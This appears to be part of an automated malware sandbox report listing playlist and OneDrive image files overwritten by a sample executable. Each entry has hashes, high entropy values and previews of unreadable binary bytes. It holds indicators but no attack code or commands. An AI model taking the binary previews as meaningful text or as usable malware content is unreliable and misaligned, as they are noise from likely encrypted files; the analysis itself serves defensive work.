                                                                                                                                                                                                    Preview: L..nS...7I..k......x...0..iay......E@.O3.v.D..0.?..F....1.`.^,.C........."...c..>5......m.5.=.<..Ch7z\.3...V....|4.(.....5...3.O....Qo....*... p..G.....k.LS~:r.wk.b:4..|J....(....3.W......k.a..?........[.?>.X+.........K.&Vj.d..Qq2a6.j...DC!.....?u......2...u.a...I...!.. .{.t...cJ....KB.H......m^.....[f?.j..+P.X%x^M.b.[5.q....E.......g8...^..'.>=.....N.........g..........U.... z..x!...9.....*9$ .i.2..%.k..l5f...mB...wXv.....Z..h/l..9.f.].R.O....l...K.tk.....%N..A..>V..gg...KK-+.:r...{e.......9.....s....Z.F"R....`.....m}./.l(.P..rP...dG.........J j;n.S..e.......I...`........=.yN.lj$8U....k.M2..*.5D..YR.;...7.}.D.q.f..+.EuA.a...`.l..g.$......7@........G......U5S....zg..5......U`....x.g@[. .I"...%..Q.V$.tF..4..+.nj.fr.v...p..$.."%........S.......Z!....p.2.f....9.ZI.y...%R.2.7.1?...`...2..f..R..<.Qg..j.k.....d=.-..<....7L.I....5..S'....`...>....KS."d..U..F...%..T9.,.c7.rl).._N...:.)...N.....y......)...i..?...:...tH...=.......(..8....c][...].
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\11_All_Pictures.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                                    Entropy (8bit):7.736573265030951
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:BVY48e3jOYrlQG39EOmQTs3cT/Ckn+Po7bD:BVYZYVEbGs3cDGED
                                                                                                                                                                                                    MD5:D350086538DE4FCA1FD669B9242756F7
                                                                                                                                                                                                    SHA1:F37495D0B3CBF1E87C85DEE513AF0D8CF6463D9C
                                                                                                                                                                                                    SHA-256:98AE0EECCAFC8FC7DEEEECB6E53778238AA87FA0E273DE8C8D24018B09618A87
                                                                                                                                                                                                    SHA-512:10C334DC7D47181AA73FDCE28AF847D98044B55496086C309624FEBC4AA86E5974462B2B95D065404827187E4A417378BD40932C9F4A0CA88AF1023E1C5B07AC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .#..Y..2..T..v_...i..^.....C.....>1.@9.<x....-..3!T....v.'..(.:..../a...F.(Z..z...6.dn...p.............*RU...\....h.`B.w8.....lE.%..crX...|F*. ..L1...k.%l.....B...:.M...s{....N...*{.....B...-.:....]Z._...v".:7..".........l............y..x.r!..."t*.....o..yE.x...4.#............u.>....%Cd..8..;..jj.[.....=.E.%LIC...g..`Yjk\......`[..#.#`(4....d..VA>N.7.g.M.n.).01T.&a.r.a.....GE?..nS....]..5....x...5.m;.....b>...-.D).......d..y.z.t6....u.^.l.N.S...a..@.-xd.>o.....S....L.U.4%.9.s...^......W..(.m.K..|......3G...~..(R..wI.4...F....z.........v...w.w.l.......W....p.m..g.l....K....o.,\.i.......h.........K..([i....}._...5...(.5p.4..#}~.cr?']V.G./..(.~..4.._..p......`..0.h......V.......V.9.,mwU0.....;...oB......f...........l..G..Ac..u.;]."..R.77yD7..K.J...!.#.H"hrG.[.......Z.........*1.........L.M.'.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\12_All_Video.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1408
                                                                                                                                                                                                    Entropy (8bit):7.870090777212142
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:0qPKScL1OVuqNU97jvImPbvLWSPzS74N/E+Dbi3eJDHu3tI+cSHbD:0qPqUDNCHvImTvLWSP/8q8eJDOeS7D
                                                                                                                                                                                                    MD5:E88241B0C355D8B010ACACAB4FC8EA22
                                                                                                                                                                                                    SHA1:7B0C8B9692C13E7C600372D9E3410E41FECDB8F5
                                                                                                                                                                                                    SHA-256:5617CC1A7AE0F9976CF146E95DE24A445C13E067FB1688DDAA111A01568A02FC
                                                                                                                                                                                                    SHA-512:08348D5722210FD3B738718D5815A079393C2B28F0AFF786FAB12321A1272026B351EC1389D15B96D3A09B5AD9A7E4ACCF3A85D38A8304DB920E330DA652C89F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...P...1...;.....j;.zx.-...a,I.|.9i9.=..6....,.......#A=....W..X.O..U...p.d...>.O.GTf....Q(..d:.Y......?...h......d.......U...L.h.&.l......).c...Pk.d.a.[.{...&.s.).n.&......).....Lp...........+..d.>.3x..........=..T...K._k.Xya@..1..4.C..S|T.....-#.2.@..2p-2Y..F..p|.../.9.............dx..........v.._.d....8...X;!edy...(..g....I......,r.....T..M.....~br.S....G.......=.f......`:..eoo.<.&.........b.....:.r.._.....#$t}?...a.....Y.K/. ...kx.P..<d..$ ..iT.<.Qc..x....HT.....s.H.xj.. Fu.P.R......6.Ak.z*.%rE...h.ow..+..g~.....i.:...8@[. ..../.{...{...S.......!...`.*O..e....S.`O.....MC;..n.g..?1....^...\...1.b.......T...X@"6.n.......;..$...Gu..a&~Ytj3>^.vE",..7.B...\\(.Y.Bo........Tym..k.>7._..q..i....~.n.....*eX*..x....`.e...w........D.'.YX...[@O...Y........&1.OwIU(@1.8P.."*4.p....`..+.N(.J|.V.z..._Qc....*...G.f.....L..,..*...&..Y.P.....eD.8u...Ez..Y.?..^..@..b.RK.u.j..M.8....}..Y._.03.....=S(FV..X..u>..l0I.(............8.0}.x..`.[
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1478
                                                                                                                                                                                                    Entropy (8bit):7.883842143484792
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:mKn8FzEuG0I9XPeAfnNUQxFBwdnJs06ntMAtwu83qiWmWIpadX4jG1w0XbD:mJSJHNfn6QxFBov6tMAtwu8aLgQ4yrrD
                                                                                                                                                                                                    MD5:4F9986F07AD7609B8928037D3CA38B3B
                                                                                                                                                                                                    SHA1:4B270F25C31E6C150FA096675EDD224B049EF321
                                                                                                                                                                                                    SHA-256:86DC85767167C28B19EFD2B8F83734FD32F6BFA3E2D61FF55CBF7E335586C4B7
                                                                                                                                                                                                    SHA-512:648761AE867216B98F3F1046D011D10852C3D758B142377C739EF04664BF7B9112DB45CD1FD874DC438C8FF6636144561C25B1A517B9AE819A858B40A7EFBD34
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .@.O....svzacD%..l.......A...m.<.<.....+=;2rR..L........9.. I..]...6..O.].Pa.l..|.......>.HI.....7+.."..j.;..!.`....&.......#.*.....MJ....".3..TF..?8+.jN.$...PR....\...N. ......C.}.J?...z..(.".a../4...'......Y..;e..8.~!...W..SK..=..t.|.p9E..q.X.....i.5._..A......[..`.i.!.r.y..hf..]o....bX.....&@wve.{..,.c.*r..>7..jk.R........k...........1.T.....^.x./.F..@ o1(.t*/......gPx.e.o..-^.q...[d.7Q.%.t..G.Jy.L@@j.....Gt8...y.$....h..p....L.]....Q..-......b../l.w.u...n^......."..5..a...z.>Db..b.CYy...*ve..~....{'d=.......I.*u.+E,.\.........<I. .#....l..7X.R..2.R\......Q1.|.|.\../......h..G...*}|...Z..=^.>.h...d:......*w.....!..R>>..z_.`A...e.+:.......kZ...1.\...wp....~..Nth..]..Z..1.....2h..f_5./..q......!.o'..O.......u.(i.....4|B..BV.(X.w..B..N.#y...FYG...kEk....fJ..2.M.D.K.@[...u6D4.G6..t...{%$gd.'...)........L(.[..H.....?p.....[...w..Lq`..$:..S.............ptC.(...)D...x.Z.D..,.EaB...[[.F.........C{..~..knjS..R...5}.{....!M..{...a......R.a..&
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1872
                                                                                                                                                                                                    Entropy (8bit):7.874657425686683
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:esST6RHtRv0Ej45TlXjQ6tMGw/mdzUbSo5GwgoQuGHVpASVzD:dCK/0E6XjlTwdYuGHVXF
                                                                                                                                                                                                    MD5:CE5880D758A9B17C5FEB3606E3B3012A
                                                                                                                                                                                                    SHA1:5F55E06496FF642B96E726A4CA31FF2EBD0A5DC8
                                                                                                                                                                                                    SHA-256:22033DFC59BE2B1EBCF4E44C0A8F71ABA25ECBC815F8DDFECE95FE3C9B5BEA8C
                                                                                                                                                                                                    SHA-512:591ED39E0270EE0933D2B8AFACD56B4DF91A3D2FB0D0E4BE60C76CA5BF3FA6EC8538037E8E8140497248A76ADFAC9998175778D6E855CCAF2FEB74CB8E6A5A77
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: sJA..z..+MX.!......`&#I..e....O.^w...V.&.f<._..p#.d..".CK...mx....$..N...bN.7.s......7.OA.Tc0..g.ti.W7.F!.G*EO6..z.m.n.o.g.z....)..\.F.JG..q.lx...I8D......o}.<.%..`j.T.....d..hc..]..5./.r...K%.......n.t&...m8).H.....].....J......e.}{6...UN.....&T.......?ia.|..C....]t...../.c.....|gx...s.).s.'...ty.....J...W{....&.D'Cy. ..c2f..O.(g...~...*.....5=.FY<V...5,M....x.[$P.}Euj.L..;G%....p..F.b.D........v...n8rhb....Z....M...R..J.+N.....A.......C......|.#..&'.;{......LU.KE.=.....F..n....J..!.S....j.P.2Z.2...4......]...Z`(g.{...:r/.^q../6..b.......<1iq.x..h.U..>..j..}w..6.d.7q[...}.f.{ hg=$p..t..e..r...w.J...iC.;z.......7...#..;uU..07..jI;.r.V]..:.t4.;N.B....Q.Y..U..........kk.......M..b...uI6....R. .!.4|z.jaWe.04.P....^4.Q.m.x;...4.tT..E.gv.@...ID..$.[X..I*...L."..o@_.f.A.k....o./.}4.]T.....e!...&S.wo;...].m.........V.._j.9....k...&....L!.&a.-.L.!b&.N7#."...mEZ..(..r..a.3...#s:..rrt.q)....u6.uW..:..Y..>..].......vO.mD....Lh...$.UX....}.g.[iM
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):2458
                                                                                                                                                                                                    Entropy (8bit):7.920433423336652
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:FJJDMiRbiCGrs2iJvFL7FRcjZYZKhd9LXmD:FJJDMiROCZ2CvFLT+Tr+
                                                                                                                                                                                                    MD5:3E29C96469AA4D3C1C30A1EE8567B5BA
                                                                                                                                                                                                    SHA1:B0BBC1DCFF7514CE0DAFF307AF090EAADF7E6C3A
                                                                                                                                                                                                    SHA-256:A965FC16E92920BE62E62831B5D6877ACE7E0FB9A5BA2EBB58E3449A862AC4B9
                                                                                                                                                                                                    SHA-512:2077F6B6907CF05E95559A506557EC280C1BA8C1A948D0BC2DA800292344E821C64041F8C0C309BB7B45D0EF1FA8172EC0805CB0B42B95608A3446E01BDE4549
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..J......@.(<9E.GI..G.2.=z...?Nb...)......F......;qm8.<`x&......o.=kk3-.c2..~3........r2....]s....@...g........s.b..tvQ.d.w....v.....+n..|.R;..2<.....>U3..r8]..a.<ZU..yl..`.G..v.>..}....D..j..6..%t.Jres.(....i......y....0.2JWZt.?tN.*.:.*.....g.a..>K.....`Aa&.4.IM.9..P.t5.. B...2z........h.CSZ i..\,M....z.8.'.......V|.P....q*'Q(...[..W..X..>.J...#l.........=ek......6....).....13.......krjJ*...y..s..u......:..D.2.}9<`...1.Y.....d....Qc........'.V4.pD....y...>....(..&.xLE...&.>...G.s...'&...|W,l7/..*T".....O.Y.;.9...g..\..[..~..YZ..;.t......}h...k.q.>A...d..C.eI.....1...].q .....].......]..WL...S3......y.@...........L....OAH.....R..{..'"...-...F..-..8;.|.n..~.1'...'.(...3.A..<2..18.......DV......,...x..).-...(U.z.%9q.)b.Q...l}I}..1.P@~....i...#..6..b.9..RG.Z<~~..|..X..d.>.'.S.[...[8...h......i..H.&...C.nqh..!g.......c.u]..:......dW3.....l.. #.!..`....l...C\^..?....g.. ...L.n2i...f.G...p2..,wy..\4.A.i..*Zy...q0.6.|.r..2.8..#.q..O1..t".3.H.G.8.S
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3081
                                                                                                                                                                                                    Entropy (8bit):7.925866760021877
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:Le+S1R4TRhsoeJQ/4fVmk3RjuyPRhy+jGgixks:nS1R2soeW2mktukRhy+6gixks
                                                                                                                                                                                                    MD5:A0F0ABBD9AC5F950E1B0DEDCDEF36E45
                                                                                                                                                                                                    SHA1:C9B689AE0CF9B9FC71DB84568DCB67296B577560
                                                                                                                                                                                                    SHA-256:6EE6F8C8FC5170CE0456F1D55E121C7EE744D6E0985F9770EA8245C978F7D404
                                                                                                                                                                                                    SHA-512:FB08071203D7D5A3EBFEDD8BD29B94512AD7805359150811156D11091484365D65BC36D897D080F7404DA1DE427FB426CD6CC0CEDB1A965074EBF43103EEA312
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: d..T ....(...V.:t..OTy\B.0...>.E._.,(.S..D7............f...r..p.UQ..`-...x..u...".>..$vpWEMB>..Ty...5..$..6.hn..r...:.Pm...yo..i....m.........'..F....dF.......l.S.yf......a....4...#@Ie.:J........W.B.....o..fk..v.....hk"..D..%5>.F..t`C....3.lu...(.>.~.b.y{.'./.&?.u........*.WlT..J.<.VZ8) UT...S...c.9Q.8QLD.no......?...$F`Y.}.,...v.v....[...|..f.b.....jv.. acK.+%..........]..._.......%..r.*.......].'.sD.....K...-......').PF.?#........yyb;/......T.(A..i3.....M.5.!..*......E..CQ...-.....{>+=........-~"|..m..p;E..%..&....lc.......`.u....m...K|y..Mu......db...y..xE..=..I....a..._..}VU........>J<.O..........'D..W >.D...KrwMm?...T.Q..Uo../a.....S.o<MA..r(b.S..5...........!...c.9.O..4c.}:....../?.R..B..#.5..#C.._."s..F0_GW@.... .@...L........."..X.K`.Xu.......H.....sNe..Cw._R...q.9....=..\2......F....<9.#..p9pt~..Rn....?.sz.)...j\.....)....i.......U..}...7>..~.0...S.B..#."..z.]..z....!.......%;c...............b#......wJPB..E|dr...A.L.....@T.V;b.V.5..j
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6940
                                                                                                                                                                                                    Entropy (8bit):7.971881121482384
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Obj2TYwNASR88i8LVUeqsgh4wVF+fYOP51B:g2x3S8ikJHgy8+fYc51B
                                                                                                                                                                                                    MD5:8912888BD2D5223DE7F3EDABEBAA8D5E
                                                                                                                                                                                                    SHA1:C8880C971469D5ADC2EE4BC84E97FD410B4FB41A
                                                                                                                                                                                                    SHA-256:481359CEC7C470CCEC1B1A98F54813BED224FC35BFD8373BD5D0E78489301541
                                                                                                                                                                                                    SHA-512:DF0BC8A2B43FAAB382D9C567E53C989A284F9F587718A312142422847670281EA8147E1FD6B9BE80447EFFF2087464A638F3225DB0F6E85259BEB9AFE850ECBB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: $u...S.d..Zg.O.4..D.(.:<C..."...W.KAZs.A.a897..h.N.az.]..F..3?.g..m....S..L....p...~...Z.J.v7..&..5h2:H......P...B_..'3P...&..O..`1.*..2.5.H.Z-....L.......h...'.x..,..*q.".C.eX.(fz..f....e..............*.$....R.q..5d&{..-._......,|.p$.U`.}r.....%*.......$=...j.2:......mo.x....HP..6t..M.r....cHY....l..s.%.....B..BB .K@.J.qaZ..KZJ.zG..q;.../#....f.i2..].....$...x...'[W.<Ar.........C.5i^...C-....<.3.LLC.(...h/R...uE.3g.^.Fi.}.'..q.8.f.-....].i.z.&..h......\...X...E...#\.q.|......<..-.....:.....-.cW....p+..).....x(.......]J..R..|..Xp.b..jf.l.B......."...%:.."8..b.=.N!...........V.,....I..-.d%J.o....l*.L.[.oM....wI....0.\...F...b*$..).8.G.o..f..S<.s9...J&..l.V..Q.d...5=.H.. .8..]..c"...Q..._q..>........p.q6.{.......s ..{...'..)..T..>..uT...Y..S[H...I.Lys..U..}.o.!...*. ..90|...l.=x,.G.S@...N......?.1...y...p~...E..i.b..P...x........9M..V,o@r.r...)..|uH..a........(.&.Q...9.}..YD...( .:..7..Y.p.3\o;.T.`...r.}.?...J.=.=....HJ1Q.......R\..........
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3030
                                                                                                                                                                                                    Entropy (8bit):7.934122066589496
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:Oz19Ji2+XxPk2VQwuDo7ghIazgOVqEor9cRl/UrzikU85ZpfrBFI2sZ126FwcRys:wVPus8jazgoqJr+r/Y7ZP6LvFQYU+x9
                                                                                                                                                                                                    MD5:44233ACD0639379924F7C5972AD0F870
                                                                                                                                                                                                    SHA1:49BE07A6A8C272CE6DB8CC894C4DDCCF48C58C67
                                                                                                                                                                                                    SHA-256:88E3EFB085BAF24C8148E018AB61EE2F64D020EB11539277F2D63C4A64D973F3
                                                                                                                                                                                                    SHA-512:26E61FCA2C2D375769F97AAABFC42F6A275586334C2C575CDE8DBE8495C1206B582F4290BB0295013931BD4A45D74ACCDA95568EE588AD509F0C82EF473B52F6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..I.:...:..#....h=i0...T%..j%$..N.$.fp.,y.........7:b.>..;h..j.*^..$."lW.........!.....I]t..}HJ~..K....2W....\B.M&c=.....<S...@\..'+...1]......=j}:..6.&.....k..w..L4..".F.:...v........Q.c....G..lC.....>..."..h..0.$ME.m......`.L.Y..~g.........."...\.E..G.o..6...)..L...x.Je\..7.....z..%R. (J.a....P.Gg..G.QH!1k.C.'.S...)#..r........7.i...-..MY7un<..P#..;5...B...).9..1)...#..C.}.M....}.....D....<..51:..>.r...K....x.*.S......8G.....d.=$.f]'...4........6%Nr'3n..zS.r{j...`.M.nY..A.Oq..f.).GSm.8.}...M}.x..0....j#..7..9.~.\.KG,..._rZ6>.r...39.G....Jy...^.v.I...cX..j<.7....Z. .]Z/.|X...~..Ph..~....i....'...}....b54.B..-....H...x..M.b]{..@[...5+...?8+.v;../Gr.;.L... -..]..H.;.K...|.g.S..\.s..S.."..K..I.f..6.|..t.....4d?j].PM........_..`}..[....$......>"]\(..$.&.5 ....."k....8.........As.,.gJ......0.w>.......P.xW...._..S..:.....bg..&....].F.<...............}.F... Q.^..Z....<0..A.^.......N.N.~[#LJ0.^?..^..F.^1b...z.Y.VB*.....6F/..............h.cI.M.:....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3457
                                                                                                                                                                                                    Entropy (8bit):7.9413164133308864
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:mZH1qGqhDxGxqz7t/2WL2ACCr+RnnjetW99p/sPh02v+i:GcVWqzpOWL5a5njetWNIh02vp
                                                                                                                                                                                                    MD5:62E6998AF1DACF8CB923D70CAD195409
                                                                                                                                                                                                    SHA1:6E30E3D0EC426D42E268359FAFB0B24F08308B62
                                                                                                                                                                                                    SHA-256:8DFF3A8E0CF62DB438A1B64C0B42B3EA3B5D2B54E3AD02E4C73F75E30536AD57
                                                                                                                                                                                                    SHA-512:3837A641E0293EB259693DE72939E536D2B70DAAA13DDA129F3B054191D222F3474B28BB300255CF4DF1E6488F11DFE887EA4FCA2FD333B541FBDECE9CD309CE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...o.(.W-+.2.q.z.}..N..h .4.....y.3^..d.-5..$..?#X.*f5e5.....I.B:^.Dd.}q..j.&....z.''....e.{k.<"..P.i..{3.6u.6...$..a.H...q........6...o>....>.=....b[..r.A9D6lI./.."..".e.:.... PMV.........$.1..px.<wO.k.N.M.....{.....X......m..%...\`.."..w......R...-]......M/..z.U..r,.b..%......*. ..{..j&..~.z.......4C1..O.1..a.._<j.....q..(......%.8I.A.\. p..J#..h.k.u...Yx.f.~L.K....@.I.K...cR9i.3d*........,...X...X!@x...Qu.^gIO......whc..E...#..2.@L#J......1>V..._v.k............4.T....G.S........P.Y|..{.0=.".o.)YM.:..V5{"".Wg,.`.;j..x....>..R...U._...I.8I...Z.kCwo....).o..P..........R.=..w6H.0...8j..d..D..i.F.....U...~........e.@.dX.(...gp.....S..b.>.vp.x..D\.wW-.......r....[.]3....?...FU.Q...E....gV.D.&5'.|...E.X.C1._......O...I.._...I......^...Fn......J@..&.A..~I......m..}..,..././K.^..Kl.....q...G..;.J@m..b~.1..<L..i..$>M...ZD.$.......zw...':.r$.A..|..I5.*...yTH.]6.....[.7../.S.c...E..+pV..#....?....n..F.%|....<..G.c...4....b../S.g.......{.y.~
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:"compact bitmap" format (Poskanzer)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4003
                                                                                                                                                                                                    Entropy (8bit):7.956080703091337
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:OG3uSTIUm35S6zd3rEnWtWBIp6KDwa6Ea8Y+:frRHMsKUa6Ed7
                                                                                                                                                                                                    MD5:8111B9383BE1D8ABF1C8DBAA70818075
                                                                                                                                                                                                    SHA1:3882BBA60EA6E3677D6BF9676B81BA58EEA54022
                                                                                                                                                                                                    SHA-256:BC26AD94491576EB01678C551F42ADCD9A2B8BC9F55919294A68CF97F06E4ABA
                                                                                                                                                                                                    SHA-512:C5AB3FC255937E8ACB88DAFB89F18C8B72C25B3D7513F93ADFB7DBE8F78F14280BD6F30D17A8C3D75B4672FCA37801D4F18C51A8397E0F184CD5393CC8373F04
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .*..v.Q..`y..:+Yo...,....O.f....<[.<.>1...]..b...._?...<.rV.. ...k..h.: Y.,.~.'..].f?....+/~.c....fks..%kvx....<.(\Q...C....G..)...6E..:.m'zr.D.;...Y.ok....N6|.h.%.......oH..f.o...3..osQ.qi]..,.Wi..K....t.X[R....p...n..H.....f..~..}.jC.p.9)Xo....z...W.eRx`h.P.=6....(..k.z0..`....>....6.s.....`0.f9...Y.|r...../.....p..z..]g.N. 8..{(e.Y..S]._t.....#....!..~..s.w.N..B=.\.TVo...?..|.a+m?=.......U..%c.&MMs..0.,.C1p..c7h.w.f.o.L.......n..M......Ej"x....C+.4.,.t....b.G..Q.s.sb.}.......G&@...,Op.l.v.CS..R-.l.3.....y.EO.8~.......8.V...F....op'P4...;..O.<.U:j88.8Je3.....mv..B.e..?[..........b`.NQ/7.#Gl;.......O..~..K.[.f.w....x=.vsI.S........0q........H.....i1../.!.~...G...%..v.d4y'..&T..DP,.=(vg+nA.L.L.X.E.*....?.wQ.......a../.../.|I.....E.3%.h.F...4.:....Z..Dn.uhK4qk4....a..b.u...Y.E...~..J...W..T...5.....r...%.&.:.M?..a....<...3.Hg.A.M.7.%.*\.w..........O..VWV.....`...A..(...H<.|.RR$o..(/v.I.<....[UX..y-....C(..moi..J.H.B.U..C....JJ.uA.RSU.Y.`$
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4888
                                                                                                                                                                                                    Entropy (8bit):7.962351136472686
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:7G8Ib4d+4QjblcFGaW4QsGGWs43fS3MbyUEb6hmNJvvv0t4WaUmmrlURaJ8ur:9Ib4d+TGjBNusSS3wyUE2huHv3Wa/mxx
                                                                                                                                                                                                    MD5:0C949A2A2F99B493CA34C2CD7A72A836
                                                                                                                                                                                                    SHA1:B34491C8BB78AB45784A756C4EEB8685B1B5F925
                                                                                                                                                                                                    SHA-256:B82B0C0E3113DE4B75431A547AC3FDC074A0EE2DB40C5FB7E524807EA5102F71
                                                                                                                                                                                                    SHA-512:A2528AFBD143521C94051BA742D850966C6945143B44C6EBC56244D9D1FEE3480919AD3D9850CA51F57E346DEE44AA75DF5EE25BCF0FF8BA7B00FEB64A8C4E27
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: n.....'..H.VN....RB2)0..&j>..YAlb......R..9.......!D...B.gR.OhY.{...H..........w..B....(.2.K..*.0...._....W..|.....1./...x.Z..|;.V...>.hJn.t.......Z8.;.4PQC...X....1.6..s.Iv................!b(..t.D..........\F....#....K..C..4."...J..M.*.+-=a..C.h"j...+.'.....23q....b.Vs.v0.h..P.........>..^`..........hg......v...Z<.<...Fsv.......an....{........,)R7.,..#.<.5.8.......B.d...xG%}:.z.K.C.i...yw..6..xm..}=.a'<[.|4.?bF..q....B@.&.....O......'a...k.Iz.J.]F..1B]...g.#.W,-.:)...2G....g...\...m....*.....J.....BD.Zm...B.@O..^.~.......fH...1wb...#.I..!..'...b.eE...eC..?..o.)M..d%..p$......g.....B}...-.X.N.y...L..u.......ZXc\/..'...p....]......Gr.....,...!..D:..I5.5Ps.5b.A..x...`....~.7.;/!..>....B?.....X........G...c......&.....c...u{.=J7.RP.RK$u.M&$.....<.[..P.K\..ozv....F..Z=SsW.B.-.`.|0.o.2...{>j..-.\$S..AcL.c..O.aW..l."~.)..p.@-x.k...l!9..b[.9.<;q.U..j...2.`xs...H.:y.....?g....=...n .,(C@.o...NVB...O......4..4.o..... ...w1..0g..]..P.-|..\@).T,.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8738
                                                                                                                                                                                                    Entropy (8bit):7.980802882028629
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:7lbdmlQt8B70RfPw6RUPkvkjqb4MRVdIXsgy1lx:72Qt8B70RfPw6Rwkvkub4MRw8d3x
                                                                                                                                                                                                    MD5:CD5D7D10B06B23767221A069F8B51AAC
                                                                                                                                                                                                    SHA1:15C8D5486121EFD40AE46B9787578131477880BD
                                                                                                                                                                                                    SHA-256:6E6FBCE7ACC6C74902DB3F1F1B60E63580435F51309CA778A4490809280E2CAD
                                                                                                                                                                                                    SHA-512:DF07C2AC07A8BEF194835D7D21F7D9025645D29AD1BE27C2218548FF8CBCBB391B14D1E36969D0DCEFDC3B67F932C76103E0889752EF4A706F2A8F5941C76D19
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
